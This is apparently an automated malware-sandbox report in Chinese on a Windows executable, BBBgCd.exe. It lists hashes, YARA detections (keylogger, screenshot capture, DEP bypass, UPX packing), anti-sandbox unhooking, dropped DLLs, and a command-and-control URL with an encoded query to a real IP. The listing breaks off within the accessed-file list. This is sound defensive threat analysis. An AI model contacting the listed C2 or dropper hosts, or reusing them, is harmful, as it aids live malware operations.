魔盾安全分析报告

分析类型	开始时间	结束时间	持续时间	分析引擎版本
FILE	2023-06-07 21:03:08	2023-06-07 21:05:19	131 秒	1.4-Maldun

虚拟机机器名	标签	虚拟机管理	开机时间	关机时间
win7-sp1-x64-shaapp02-1	win7-sp1-x64-shaapp02-1	KVM	2023-06-07 21:03:10	2023-06-07 21:05:19

魔盾分数
10.0 恶意的

文件详细信息

文件名	BBBgCd.exe
文件大小	5468160 字节
文件类型	PE32 executable (GUI) Intel 80386, for MS Windows
CRC32	DAC71357
MD5	616962b526b69b6b1547ae7e36c88d95
SHA1	9249d816c8360d31e1fba60ffe40f3200302febd
SHA256	4ed65014dbfadcd23184c3f1add6e5a0d94b34c936ad32228f9e662cfd013c09
SHA512	6cd0104c4855aa35c27843acd95400cc214ad3d44c1959fd2f525add03dc4985af9f388990d2ca2bac1025c26ef118c5aa6298ba63430347fb5d99708b912f64
Ssdeep	98304:DMwhDdfHHgNO5r29rYB4I2IHhIoeCDfs2KMAdAWedEVqxJHPTKV3O4:Hfg7qreCDf7KMAGZd4qxZPq31
PEiD	无匹配
Yara	DebuggerTiming__PerformanceCounter () DebuggerTiming__Ticks (Detected timing ticks function) ThreadControl__Context () disable_dep (Bypass DEP) network_http (Detected communications function over HTTP) win_mutex (Create or check mutex) screenshot (Detected take screenshot function) create_process (Detection function for creating a new process) keylogger (Detected keylogger function) win_registry (Detected system registries modification function) change_win_registry (Change registries to affect system) win_files_operation (Affect private profile) win_hook (Detected hook table access function) win_private_profile (Detected private profile access function) Maldun_Anomoly_Combined_Activities_Network_Logging (Spotted potential abnormal behaviors, like logging and network communications) Maldun_Anomoly_Combined_Activities_7 (Spotted potential malicious behaviors from a small size target, like process manipultion, privilege, token and files) IsPE32 (Detected a 32bit PE sample) IsWindowsGUI (Detected a Windows GUI sample) IsPacked (Detected Entropy signature) HasRichSignature (Detected Rich Signature) Advapi_Hash_API (Looks for advapi API functions) CRC32_poly_Constant (Look for CRC32 [poly]) CRC32_table (Look for CRC32 table) MD5_Constants (Look for MD5 constants) RIPEMD160_Constants (Look for RIPEMD-160 constants) SHA1_Constants (Look for SHA1 constants) DES_sbox (Look for DES [sbox]) with_images (Detected the presence of an or several images) with_urls (Detected the presence of an or several urls) UPXV200V290MarkusOberhumerLaszloMolnarJohnReiser () UPX (Detected UPX. Commonly used by RAT!)
VirusTotal	VirusTotal查询失败

特征

创建RWX内存

魔盾wping.org IP地址信誉系统

Greylist: 121.204.252.143

Greylist: 59.110.117.124

发起了一些HTTP请求

URL: http://121.204.252.143:8088/c.asp?code=CwNLBBBJARWBBBBBN%%2b/u/cRTOouh2vDLC0NwKNeza64NRKwolnOr2%%2b0/dqsueySYwuIMBlRP0JO29CKSDBOV/AolKNPTQPd%%2bkrYhPkpjEgrhXbTQ33ubWJ9c0TEPPLXLeQSd9Nscv5ScGztr6f3xQbmg1cBHFxenUH%%2bJjeORX/l7DYphGzaB9MjuBm%%2boE6IE3o4ju8JmRDNNe8odwQQ9bhWaXcV7pWysQMWLROFCMja87Te9ijeoXrdXzVQWEbMVAw81sKl/NAZkxvbk--23131

二进制文件可能包含加密或压缩数据

section: name: .rdata, entropy: 7.89, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ, raw_size: 0x00439000, virtual_size: 0x00438d02

样本投放可执行文件到临时目录

网络活动包含了一个以上的不重复的用户代理

Process: BBBgCd.exe

User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)

从文件自身的二进制镜像中读取数据

self_read: process: BBBgCd.exe, pid: 2684, offset: 0x00000000, length: 0x00537000

通过进程尝试长时间延迟分析任务

Process: BBBgCd.exe tried to sleep 330 seconds, actually delayed analysis time by 0 seconds

创建一个隐藏文件或系统文件

file: C:\Users\test\AppData\Local\Temp\sf.dll

file: C:\Users\test\AppData\Local\Temp\DmReg.dll

HTTP数据流中包含可疑的恶意软件数据

get_no_useragent: HTTP traffic contains a GET request with no user-agent header

http_version_old: HTTP traffic uses version 1.0

ip_hostname: HTTP connection was made to an IP address rather than domain name

suspicious_request: http://121.204.252.143:8088/c.asp?code=CwNLBBBJARWBBBBBN%%2b/u/cRTOouh2vDLC0NwKNeza64NRKwolnOr2%%2b0/dqsueySYwuIMBlRP0JO29CKSDBOV/AolKNPTQPd%%2bkrYhPkpjEgrhXbTQ33ubWJ9c0TEPPLXLeQSd9Nscv5ScGztr6f3xQbmg1cBHFxenUH%%2bJjeORX/l7DYphGzaB9MjuBm%%2boE6IE3o4ju8JmRDNNe8odwQQ9bhWaXcV7pWysQMWLROFCMja87Te9ijeoXrdXzVQWEbMVAw81sKl/NAZkxvbk--23131

建立TCP连接到一个外部IP地址的非标准端口

Connection: 121.204.252.143:8088

魔盾安全Yara规则检测结果 - 高危

Warning: Bypass DEP

Critical: Spotted potential abnormal behaviors, like logging and network communications

Critical: Spotted potential malicious behaviors from a small size target, like process manipultion, privilege, token and files

Warning: Looks for advapi API functions

Warning: Detected UPX. Commonly used by RAT!

尝试断开连接或更改沙箱进程监控的Windows功能

unhook: function_name: NtOpenKey, type: modification

unhook: function_name: NtQueryValueKey, type: modification

unhook: function_name: NtQueryKey, type: modification

unhook: function_name: NtOpenKeyEx, type: modification

unhook: function_name: NtClose, type: modification

运行截图

网络分析

访问主机记录

直接访问	IP地址	国家名
是	121.204.252.143	China
否	59.110.117.124	China

域名解析

域名	响应
moamoamoa.oss-cn-beijing.aliyuncs.com	A 59.110.117.124

TCP连接

IP地址	端口
121.204.252.143	8088
23.219.38.8	80
59.110.117.124	443
59.110.117.124	443

UDP连接

IP地址	端口
192.168.122.1	53
192.168.122.1	53

HTTP请求

URL	HTTP数据
http://acroipm.adobe.com/11/rdr/CHS/win/nooem/none/message.zip	GET /11/rdr/CHS/win/nooem/none/message.zip HTTP/1.1 Accept: / If-Modified-Since: Mon, 08 Nov 2017 08:44:36 GMT User-Agent: IPM Host: acroipm.adobe.com Connection: Keep-Alive Cache-Control: no-cache
http://121.204.252.143:8088/c.asp?code=CwNLBBBJARWBBBBBN%%2b/u/cRTOouh2vDLC0NwKNeza64NRKwolnOr2%%2b0/dqsueySYwuIMBlRP0JO29CKSDBOV/AolKNPTQPd%%2bkrYhPkpjEgrhXbTQ33ubWJ9c0TEPPLXLeQSd9Nscv5ScGztr6f3xQbmg1cBHFxenUH%%2bJjeORX/l7DYphGzaB9MjuBm%%2boE6IE3o4ju8JmRDNNe8odwQQ9bhWaXcV7pWysQMWLROFCMja87Te9ijeoXrdXzVQWEbMVAw81sKl/NAZkxvbk--23131	GET /c.asp?code=CwNLBBBJARWBBBBBN%%2b/u/cRTOouh2vDLC0NwKNeza64NRKwolnOr2%%2b0/dqsueySYwuIMBlRP0JO29CKSDBOV/AolKNPTQPd%%2bkrYhPkpjEgrhXbTQ33ubWJ9c0TEPPLXLeQSd9Nscv5ScGztr6f3xQbmg1cBHFxenUH%%2bJjeORX/l7DYphGzaB9MjuBm%%2boE6IE3o4ju8JmRDNNe8odwQQ9bhWaXcV7pWysQMWLROFCMja87Te9ijeoXrdXzVQWEbMVAw81sKl/NAZkxvbk--23131 HTTP/1.0 Host: 121.204.252.143

URL

HTTP数据

http://acroipm.adobe.com/11/rdr/CHS/win/nooem/none/message.zip

GET /11/rdr/CHS/win/nooem/none/message.zip HTTP/1.1
Accept: */*
If-Modified-Since: Mon, 08 Nov 2017 08:44:36 GMT
User-Agent: IPM
Host: acroipm.adobe.com
Connection: Keep-Alive
Cache-Control: no-cache

http://121.204.252.143:8088/c.asp?code=CwNLBBBJARWBBBBBN%%2b/u/cRTOouh2vDLC0NwKNeza64NRKwolnOr2%%2b0/dqsueySYwuIMBlRP0JO29CKSDBOV/AolKNPTQPd%%2bkrYhPkpjEgrhXbTQ33ubWJ9c0TEPPLXLeQSd9Nscv5ScGztr6f3xQbmg1cBHFxenUH%%2bJjeORX/l7DYphGzaB9MjuBm%%2boE6IE3o4ju8JmRDNNe8odwQQ9bhWaXcV7pWysQMWLROFCMja87Te9ijeoXrdXzVQWEbMVAw81sKl/NAZkxvbk--23131

GET /c.asp?code=CwNLBBBJARWBBBBBN%%2b/u/cRTOouh2vDLC0NwKNeza64NRKwolnOr2%%2b0/dqsueySYwuIMBlRP0JO29CKSDBOV/AolKNPTQPd%%2bkrYhPkpjEgrhXbTQ33ubWJ9c0TEPPLXLeQSd9Nscv5ScGztr6f3xQbmg1cBHFxenUH%%2bJjeORX/l7DYphGzaB9MjuBm%%2boE6IE3o4ju8JmRDNNe8odwQQ9bhWaXcV7pWysQMWLROFCMja87Te9ijeoXrdXzVQWEbMVAw81sKl/NAZkxvbk--23131 HTTP/1.0
Host: 121.204.252.143

静态分析

PE 信息

初始地址	0x00400000
入口地址	0x004addd5
声明校验值	0x00000000
实际校验值	0x0053fc69
最低操作系统版本要求	4.0
编译时间	2023-02-05 16:47:49
载入哈希	35c91177c389e917ad24897bc4ed16c5

PE数据组成

名称	虚拟地址	虚拟大小	原始数据大小	特征	熵(Entropy)
.text	0x00001000	0x000cc9e6	0x000cd000	IMAGE_SCN_CNT_CODE\|IMAGE_SCN_MEM_EXECUTE\|IMAGE_SCN_MEM_READ	6.51
.rdata	0x000ce000	0x00438d02	0x00439000	IMAGE_SCN_CNT_INITIALIZED_DATA\|IMAGE_SCN_MEM_READ	7.89
.data	0x00507000	0x0005552a	0x0001a000	IMAGE_SCN_CNT_INITIALIZED_DATA\|IMAGE_SCN_MEM_READ\|IMAGE_SCN_MEM_WRITE	5.06
.rsrc	0x0055d000	0x00015740	0x00016000	IMAGE_SCN_CNT_INITIALIZED_DATA\|IMAGE_SCN_MEM_READ	6.63

导入

库 iphlpapi.dll:

• 0x4ce6f4 - GetAdaptersInfo

库 WINMM.dll:

• 0x4ce658 - midiStreamOut

• 0x4ce65c - midiOutPrepareHeader

• 0x4ce660 - waveOutWrite

• 0x4ce664 - waveOutPause

• 0x4ce668 - waveOutReset

• 0x4ce66c - waveOutClose

• 0x4ce670 - waveOutGetNumDevs

• 0x4ce674 - waveOutOpen

• 0x4ce678 - midiOutUnprepareHeader

• 0x4ce67c - midiStreamOpen

• 0x4ce680 - midiStreamProperty

• 0x4ce684 - midiStreamStop

• 0x4ce688 - midiOutReset

• 0x4ce68c - midiStreamClose

• 0x4ce690 - midiStreamRestart

• 0x4ce694 - waveOutUnprepareHeader

• 0x4ce698 - waveOutRestart

• 0x4ce69c - waveOutPrepareHeader

库 WS2_32.dll:

• 0x4ce6b4 - WSACleanup

• 0x4ce6b8 - inet_ntoa

• 0x4ce6bc - closesocket

• 0x4ce6c0 - getpeername

• 0x4ce6c4 - accept

• 0x4ce6c8 - ntohl

• 0x4ce6cc - WSAAsyncSelect

• 0x4ce6d0 - recvfrom

• 0x4ce6d4 - ioctlsocket

• 0x4ce6d8 - recv

库 KERNEL32.dll:

• 0x4ce170 - GetWindowsDirectoryA

• 0x4ce174 - GetSystemDirectoryA

• 0x4ce178 - SetLastError

• 0x4ce17c - QueryPerformanceFrequency

• 0x4ce180 - QueryPerformanceCounter

• 0x4ce184 - GetTimeZoneInformation

• 0x4ce188 - GetVersion

• 0x4ce18c - TerminateThread

• 0x4ce190 - CreateMutexA

• 0x4ce194 - TerminateProcess

• 0x4ce198 - SuspendThread

• 0x4ce19c - UnhandledExceptionFilter

• 0x4ce1a0 - GetACP

• 0x4ce1a4 - HeapSize

• 0x4ce1a8 - RaiseException

• 0x4ce1ac - GetLocalTime

• 0x4ce1b0 - GetSystemTime

• 0x4ce1b4 - RtlUnwind

• 0x4ce1b8 - GetStartupInfoA

• 0x4ce1bc - GetOEMCP

• 0x4ce1c0 - GetCPInfo

• 0x4ce1c4 - GetProcessVersion

• 0x4ce1c8 - SetErrorMode

• 0x4ce1cc - GlobalFlags

• 0x4ce1d0 - GetCurrentThread

• 0x4ce1d4 - GetFileTime

• 0x4ce1d8 - TlsGetValue

• 0x4ce1dc - LocalReAlloc

• 0x4ce1e0 - TlsSetValue

• 0x4ce1e4 - TlsFree

• 0x4ce1e8 - GlobalHandle

• 0x4ce1ec - TlsAlloc

• 0x4ce1f0 - LocalAlloc

• 0x4ce1f4 - lstrcmpA

• 0x4ce1f8 - GlobalGetAtomNameA

• 0x4ce1fc - GlobalAddAtomA

• 0x4ce200 - GlobalFindAtomA

• 0x4ce204 - GlobalDeleteAtom

• 0x4ce208 - lstrcmpiA

• 0x4ce20c - SetEndOfFile

• 0x4ce210 - UnlockFile

• 0x4ce214 - LockFile

• 0x4ce218 - FlushFileBuffers

• 0x4ce21c - DuplicateHandle

• 0x4ce220 - lstrcpynA

• 0x4ce224 - FileTimeToLocalFileTime

• 0x4ce228 - FileTimeToSystemTime

• 0x4ce22c - LocalFree

• 0x4ce230 - InterlockedDecrement

• 0x4ce234 - InterlockedIncrement

• 0x4ce238 - GetCurrentProcess

• 0x4ce23c - GetFileSize

• 0x4ce240 - SetFilePointer

• 0x4ce244 - CreateSemaphoreA

• 0x4ce248 - ResumeThread

• 0x4ce24c - ReleaseSemaphore

• 0x4ce250 - EnterCriticalSection

• 0x4ce254 - LeaveCriticalSection

• 0x4ce258 - GetProfileStringA

• 0x4ce25c - WriteFile

• 0x4ce260 - WaitForMultipleObjects

• 0x4ce264 - CreateFileA

• 0x4ce268 - DeviceIoControl

• 0x4ce26c - SetEvent

• 0x4ce270 - FindResourceA

• 0x4ce274 - LoadResource

• 0x4ce278 - LockResource

• 0x4ce27c - ReadFile

• 0x4ce280 - lstrlenW

• 0x4ce284 - GetModuleFileNameA

• 0x4ce288 - WideCharToMultiByte

• 0x4ce28c - MultiByteToWideChar

• 0x4ce290 - GetCurrentThreadId

• 0x4ce294 - ExitProcess

• 0x4ce298 - GlobalSize

• 0x4ce29c - GlobalFree

• 0x4ce2a0 - DeleteCriticalSection

• 0x4ce2a4 - InitializeCriticalSection

• 0x4ce2a8 - lstrcatA

• 0x4ce2ac - lstrlenA

• 0x4ce2b0 - WinExec

• 0x4ce2b4 - lstrcpyA

• 0x4ce2b8 - FindNextFileA

• 0x4ce2bc - InterlockedExchange

• 0x4ce2c0 - GlobalReAlloc

• 0x4ce2c4 - HeapFree

• 0x4ce2c8 - HeapReAlloc

• 0x4ce2cc - GetProcessHeap

• 0x4ce2d0 - HeapAlloc

• 0x4ce2d4 - GetUserDefaultLCID

• 0x4ce2d8 - GetFullPathNameA

• 0x4ce2dc - FreeLibrary

• 0x4ce2e0 - LoadLibraryA

• 0x4ce2e4 - GetLastError

• 0x4ce2e8 - GetVersionExA

• 0x4ce2ec - WritePrivateProfileStringA

• 0x4ce2f0 - CreateThread

• 0x4ce2f4 - CreateEventA

• 0x4ce2f8 - Sleep

• 0x4ce2fc - GlobalAlloc

• 0x4ce300 - GlobalLock

• 0x4ce304 - GlobalUnlock

• 0x4ce308 - GetTempPathA

• 0x4ce30c - FindFirstFileA

• 0x4ce310 - FindClose

• 0x4ce314 - SetFileAttributesA

• 0x4ce318 - GetFileAttributesA

• 0x4ce31c - MoveFileA

• 0x4ce320 - DeleteFileA

• 0x4ce324 - CreateDirectoryA

• 0x4ce328 - SetCurrentDirectoryA

• 0x4ce32c - GetVolumeInformationA

• 0x4ce330 - GetModuleHandleA

• 0x4ce334 - GetProcAddress

• 0x4ce338 - MulDiv

• 0x4ce33c - GetCommandLineA

• 0x4ce340 - GetTickCount

• 0x4ce344 - CreateProcessA

• 0x4ce348 - WaitForSingleObject

• 0x4ce34c - CloseHandle

• 0x4ce350 - FreeEnvironmentStringsA

• 0x4ce354 - FreeEnvironmentStringsW

• 0x4ce358 - GetEnvironmentStrings

• 0x4ce35c - GetEnvironmentStringsW

• 0x4ce360 - SetHandleCount

• 0x4ce364 - GetStdHandle

• 0x4ce368 - GetFileType

• 0x4ce36c - GetEnvironmentVariableA

• 0x4ce370 - HeapDestroy

• 0x4ce374 - HeapCreate

• 0x4ce378 - VirtualFree

• 0x4ce37c - SetEnvironmentVariableA

• 0x4ce380 - LCMapStringA

• 0x4ce384 - LCMapStringW

• 0x4ce388 - VirtualAlloc

• 0x4ce38c - IsBadWritePtr

• 0x4ce390 - SetUnhandledExceptionFilter

• 0x4ce394 - GetStringTypeA

• 0x4ce398 - GetStringTypeW

• 0x4ce39c - CompareStringA

• 0x4ce3a0 - CompareStringW

• 0x4ce3a4 - IsBadReadPtr

• 0x4ce3a8 - IsBadCodePtr

• 0x4ce3ac - SetStdHandle

• 0x4ce3b0 - ReleaseMutex

库 USER32.dll:

• 0x4ce3f0 - DestroyAcceleratorTable

• 0x4ce3f4 - GetWindow

• 0x4ce3f8 - GetActiveWindow

• 0x4ce3fc - SetFocus

• 0x4ce400 - IsIconic

• 0x4ce404 - PeekMessageA

• 0x4ce408 - SetMenu

• 0x4ce40c - GetMenu

• 0x4ce410 - SetWindowRgn

• 0x4ce414 - GetMessagePos

• 0x4ce418 - ScreenToClient

• 0x4ce41c - GetSysColorBrush

• 0x4ce420 - GetKeyState

• 0x4ce424 - TranslateAcceleratorA

• 0x4ce428 - IsWindowEnabled

• 0x4ce42c - ShowWindow

• 0x4ce430 - SystemParametersInfoA

• 0x4ce434 - LoadImageA

• 0x4ce438 - EnumDisplaySettingsA

• 0x4ce43c - ClientToScreen

• 0x4ce440 - EnableMenuItem

• 0x4ce444 - GetSubMenu

• 0x4ce448 - GetDlgCtrlID

• 0x4ce44c - CreateAcceleratorTableA

• 0x4ce450 - CreateMenu

• 0x4ce454 - ModifyMenuA

• 0x4ce458 - AppendMenuA

• 0x4ce45c - CreatePopupMenu

• 0x4ce460 - DrawIconEx

• 0x4ce464 - CreateIconFromResource

• 0x4ce468 - CreateIconFromResourceEx

• 0x4ce46c - SetRectEmpty

• 0x4ce470 - DispatchMessageA

• 0x4ce474 - GetMessageA

• 0x4ce478 - ChildWindowFromPointEx

• 0x4ce47c - CopyRect

• 0x4ce480 - LoadBitmapA

• 0x4ce484 - WinHelpA

• 0x4ce488 - KillTimer

• 0x4ce48c - SetTimer

• 0x4ce490 - ReleaseCapture

• 0x4ce494 - GetCapture

• 0x4ce498 - SetCapture

• 0x4ce49c - GetScrollRange

• 0x4ce4a0 - SetScrollRange

• 0x4ce4a4 - SetScrollPos

• 0x4ce4a8 - LoadStringA

• 0x4ce4ac - GetMenuCheckMarkDimensions

• 0x4ce4b0 - GetMenuState

• 0x4ce4b4 - SetMenuItemBitmaps

• 0x4ce4b8 - CheckMenuItem

• 0x4ce4bc - SetRect

• 0x4ce4c0 - InflateRect

• 0x4ce4c4 - IntersectRect

• 0x4ce4c8 - PtInRect

• 0x4ce4cc - OffsetRect

• 0x4ce4d0 - IsWindowVisible

• 0x4ce4d4 - EnableWindow

• 0x4ce4d8 - RedrawWindow

• 0x4ce4dc - GetWindowLongA

• 0x4ce4e0 - SetWindowLongA

• 0x4ce4e4 - GetSysColor

• 0x4ce4e8 - SetActiveWindow

• 0x4ce4ec - SetCursorPos

• 0x4ce4f0 - LoadCursorA

• 0x4ce4f4 - SetCursor

• 0x4ce4f8 - GetDC

• 0x4ce4fc - FillRect

• 0x4ce500 - IsRectEmpty

• 0x4ce504 - ReleaseDC

• 0x4ce508 - IsChild

• 0x4ce50c - DestroyMenu

• 0x4ce510 - SetForegroundWindow

• 0x4ce514 - GetWindowRect

• 0x4ce518 - EqualRect

• 0x4ce51c - UpdateWindow

• 0x4ce520 - ValidateRect

• 0x4ce524 - InvalidateRect

• 0x4ce528 - GetClientRect

• 0x4ce52c - GetFocus

• 0x4ce530 - GetParent

• 0x4ce534 - GetTopWindow

• 0x4ce538 - PostMessageA

• 0x4ce53c - IsWindow

• 0x4ce540 - SetParent

• 0x4ce544 - DestroyCursor

• 0x4ce548 - SendMessageA

• 0x4ce54c - SetWindowPos

• 0x4ce550 - MessageBoxA

• 0x4ce554 - GetCursorPos

• 0x4ce558 - GetSystemMetrics

• 0x4ce55c - EmptyClipboard

• 0x4ce560 - SetClipboardData

• 0x4ce564 - OpenClipboard

• 0x4ce568 - GetClipboardData

• 0x4ce56c - CloseClipboard

• 0x4ce570 - wsprintfA

• 0x4ce574 - WaitForInputIdle

• 0x4ce578 - WindowFromPoint

• 0x4ce57c - DrawFocusRect

• 0x4ce580 - DrawEdge

• 0x4ce584 - DrawFrameControl

• 0x4ce588 - TranslateMessage

• 0x4ce58c - LoadIconA

• 0x4ce590 - GetDesktopWindow

• 0x4ce594 - GetClassNameA

• 0x4ce598 - GetDlgItem

• 0x4ce59c - GetWindowTextA

• 0x4ce5a0 - GetForegroundWindow

• 0x4ce5a4 - DefWindowProcA

• 0x4ce5a8 - GetClassInfoA

• 0x4ce5ac - IsZoomed

• 0x4ce5b0 - PostQuitMessage

• 0x4ce5b4 - DestroyIcon

• 0x4ce5b8 - CopyAcceleratorTableA

• 0x4ce5bc - UnregisterClassA

• 0x4ce5c0 - RegisterClipboardFormatA

• 0x4ce5c4 - GetWindowTextLengthA

• 0x4ce5c8 - CharUpperA

• 0x4ce5cc - GetWindowDC

• 0x4ce5d0 - BeginPaint

• 0x4ce5d4 - EndPaint

• 0x4ce5d8 - TabbedTextOutA

• 0x4ce5dc - DrawTextA

• 0x4ce5e0 - GrayStringA

• 0x4ce5e4 - DestroyWindow

• 0x4ce5e8 - CreateDialogIndirectParamA

• 0x4ce5ec - EndDialog

• 0x4ce5f0 - GetNextDlgTabItem

• 0x4ce5f4 - GetWindowPlacement

• 0x4ce5f8 - RegisterWindowMessageA

• 0x4ce5fc - GetLastActivePopup

• 0x4ce600 - GetMessageTime

• 0x4ce604 - RemovePropA

• 0x4ce608 - CallWindowProcA

• 0x4ce60c - GetPropA

• 0x4ce610 - UnhookWindowsHookEx

• 0x4ce614 - SetPropA

• 0x4ce618 - GetClassLongA

• 0x4ce61c - CallNextHookEx

• 0x4ce620 - SetWindowsHookExA

• 0x4ce624 - CreateWindowExA

• 0x4ce628 - GetMenuItemID

• 0x4ce62c - GetMenuItemCount

• 0x4ce630 - RegisterClassA

• 0x4ce634 - GetScrollPos

• 0x4ce638 - AdjustWindowRectEx

• 0x4ce63c - MapWindowPoints

• 0x4ce640 - SendDlgItemMessageA

• 0x4ce644 - ScrollWindowEx

• 0x4ce648 - IsDialogMessageA

• 0x4ce64c - SetWindowTextA

• 0x4ce650 - MoveWindow

库 GDI32.dll:

• 0x4ce024 - GetViewportExtEx

• 0x4ce028 - ExtSelectClipRgn

• 0x4ce02c - LineTo

• 0x4ce030 - MoveToEx

• 0x4ce034 - ExcludeClipRect

• 0x4ce038 - GetClipBox

• 0x4ce03c - GetStockObject

• 0x4ce040 - GetObjectA

• 0x4ce044 - EndPage

• 0x4ce048 - EndDoc

• 0x4ce04c - DeleteDC

• 0x4ce050 - StartDocA

• 0x4ce054 - StartPage

• 0x4ce058 - BitBlt

• 0x4ce05c - CreateCompatibleDC

• 0x4ce060 - Ellipse

• 0x4ce064 - Rectangle

• 0x4ce068 - LPtoDP

• 0x4ce06c - PtVisible

• 0x4ce070 - GetCurrentObject

• 0x4ce074 - RoundRect

• 0x4ce078 - GetTextExtentPoint32A

• 0x4ce07c - GetDeviceCaps

• 0x4ce080 - CreateDIBitmap

• 0x4ce084 - DeleteObject

• 0x4ce088 - SelectClipRgn

• 0x4ce08c - CreatePolygonRgn

• 0x4ce090 - GetClipRgn

• 0x4ce094 - SetStretchBltMode

• 0x4ce098 - CreateRectRgnIndirect

• 0x4ce09c - SetBkColor

• 0x4ce0a0 - ScaleWindowExtEx

• 0x4ce0a4 - SetWindowExtEx

• 0x4ce0a8 - SetWindowOrgEx

• 0x4ce0ac - ScaleViewportExtEx

• 0x4ce0b0 - SetViewportExtEx

• 0x4ce0b4 - OffsetViewportOrgEx

• 0x4ce0b8 - SetViewportOrgEx

• 0x4ce0bc - SetMapMode

• 0x4ce0c0 - SetTextColor

• 0x4ce0c4 - SetROP2

• 0x4ce0c8 - SetPolyFillMode

• 0x4ce0cc - RectVisible

• 0x4ce0d0 - TextOutA

• 0x4ce0d4 - ExtTextOutA

• 0x4ce0d8 - Escape

• 0x4ce0dc - GetTextMetricsA

• 0x4ce0e0 - CreateFontIndirectA

• 0x4ce0e4 - CreateSolidBrush

• 0x4ce0e8 - FillRgn

• 0x4ce0ec - CreateRectRgn

• 0x4ce0f0 - CombineRgn

• 0x4ce0f4 - PatBlt

• 0x4ce0f8 - CreatePen

• 0x4ce0fc - SelectObject

• 0x4ce100 - CreateBitmap

• 0x4ce104 - CreateDCA

• 0x4ce108 - CreateCompatibleBitmap

• 0x4ce10c - GetPolyFillMode

• 0x4ce110 - GetStretchBltMode

• 0x4ce114 - GetROP2

• 0x4ce118 - GetBkColor

• 0x4ce11c - GetBkMode

• 0x4ce120 - GetTextColor

• 0x4ce124 - CreateRoundRectRgn

• 0x4ce128 - CreateEllipticRgn

• 0x4ce12c - SetBkMode

• 0x4ce130 - RestoreDC

• 0x4ce134 - SaveDC

• 0x4ce138 - PathToRegion

• 0x4ce13c - EndPath

• 0x4ce140 - BeginPath

• 0x4ce144 - GetWindowOrgEx

• 0x4ce148 - GetViewportOrgEx

• 0x4ce14c - GetWindowExtEx

• 0x4ce150 - GetDIBits

• 0x4ce154 - RealizePalette

• 0x4ce158 - SelectPalette

• 0x4ce15c - GetSystemPaletteEntries

• 0x4ce160 - DPtoLP

• 0x4ce164 - StretchBlt

• 0x4ce168 - CreatePalette

库 WINSPOOL.DRV:

• 0x4ce6a4 - OpenPrinterA

• 0x4ce6a8 - DocumentPropertiesA

• 0x4ce6ac - ClosePrinter

库 ADVAPI32.dll:

• 0x4ce000 - RegOpenKeyExA

• 0x4ce004 - RegSetValueExA

• 0x4ce008 - RegQueryValueA

• 0x4ce00c - RegCreateKeyExA

• 0x4ce010 - RegCloseKey

库 SHELL32.dll:

• 0x4ce3e0 - SHGetSpecialFolderPathA

• 0x4ce3e4 - Shell_NotifyIconA

• 0x4ce3e8 - ShellExecuteA

库 ole32.dll:

• 0x4ce6fc - CLSIDFromProgID

• 0x4ce700 - OleRun

• 0x4ce704 - CoCreateInstance

• 0x4ce708 - CLSIDFromString

• 0x4ce70c - OleUninitialize

• 0x4ce710 - OleInitialize

库 OLEAUT32.dll:

• 0x4ce3b8 - UnRegisterTypeLib

• 0x4ce3bc - LoadTypeLib

• 0x4ce3c0 - LHashValOfNameSys

• 0x4ce3c4 - RegisterTypeLib

• 0x4ce3c8 - SysAllocString

• 0x4ce3cc - VariantInit

• 0x4ce3d0 - VariantCopyInd

• 0x4ce3d4 - VariantChangeType

• 0x4ce3d8 - VariantClear

库 COMCTL32.dll:

• 0x4ce018 - None

• 0x4ce01c - ImageList_Destroy

库 comdlg32.dll:

• 0x4ce6e0 - ChooseColorA

• 0x4ce6e4 - GetFileTitleA

• 0x4ce6e8 - GetSaveFileNameA

• 0x4ce6ec - GetOpenFileNameA

投放文件

无信息

行为分析

互斥量(Mutexes)

Local\MSCTF.Asm.MutexDefault1
Local\__DDrawExclMode__
Local\__DDrawCheckExclMode__

执行的命令 无信息

创建的服务 无信息

启动的服务 无信息

进程

BBBgCd.exe PID: 2684, 上一级进程 PID: 2312

访问的文件

C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Users\test\AppData\Local\Temp\kernel32.dll
C:\Users\test\AppData\Local\Temp\kernel32.DLL
C:\Users\test\AppData\Local\Temp\Kernel32.dll
C:\Users\test\AppData\Local\Temp\wininet.dll
C:\Users\test\AppData\Local\Temp\Wininet.dll
C:\Windows\Fonts\staticcache.dat
C:\Users\test\AppData\Local\Temp\sf.dll
C:\Users\test\AppData\Local\Temp\
C:\
C:\Users\test\AppData\Local\Temp\DmReg.dll
C:\Users\test\AppData\Local\Temp\MFC42u.DLL
C:\Windows\System32\mfc42u.dll
C:\Users\test\AppData\Local\Temp\ODBC32.dll
C:\Windows\System32\odbc32.dll
C:\Users\test\AppData\Local\Temp\MSVCP60.dll
C:\Windows\System32\msvcp60.dll
C:\Windows\System32\MFC42LOC.DLL
C:\Windows\System32\MFC42LOC.DLL.DLL
C:\Windows\sysnative\MFC42LOC.DLL
C:\Windows\sysnative\MFC42LOC.DLL.DLL
\??\az1025
\??\az369
\??\az79
\??\az24786
\??\az9946
\??\az89346
\??\az7944
\??\az73925
\??\az92835
\??\az923876
\??\az237493
\??\az792385
\??\az79236
\??\az235
\??\az9726
\??\az2835
\??\az896
\??\az1027
\??\az37
\??\az8
\??\az2479
\??\az995
\??\az8935
\??\az795
\??\az7393
\??\az9284
\??\az92388
\??\az23750
\??\az79239
\??\az7924
\??\az24
\??\az973
\??\az284
\??\az90
\??\by1025
\??\by369
\??\by79
\??\by24786
\??\by9946
\??\by89346
\??\by7944
\??\by73925
\??\by92835
\??\by923876
\??\by237493
\??\by792385
\??\by79236
\??\by235
\??\by9726
\??\by2835
\??\by896
\??\by1027
\??\by37
\??\by8
\??\by2479
\??\by995
\??\by8935
\??\by795
\??\by7393
\??\by9284
\??\by92388
\??\by23750
\??\by79239
\??\by7924
\??\by24
\??\by973
\??\by284
\??\by90
\??\cx1025
\??\cx369
\??\cx79
\??\cx24786
\??\cx9946
\??\cx89346
\??\cx7944
\??\cx73925
\??\cx92835
\??\cx923876
\??\cx237493
\??\cx792385
\??\cx79236
\??\cx235
\??\cx9726
\??\cx2835
\??\cx896
\??\cx1027
\??\cx37
\??\cx8
\??\cx2479
\??\cx995
\??\cx8935
\??\cx795
\??\cx7393
\??\cx9284
\??\cx92388
\??\cx23750
\??\cx79239
\??\cx7924
\??\cx24
\??\cx973
\??\cx284
\??\cx90
\??\dw1025
\??\dw369
\??\dw79
\??\dw24786
\??\dw9946
\??\dw89346
\??\dw7944
\??\dw73925
\??\dw92835
\??\dw923876
\??\dw237493
\??\dw792385
\??\dw79236
\??\dw235
\??\dw9726
\??\dw2835
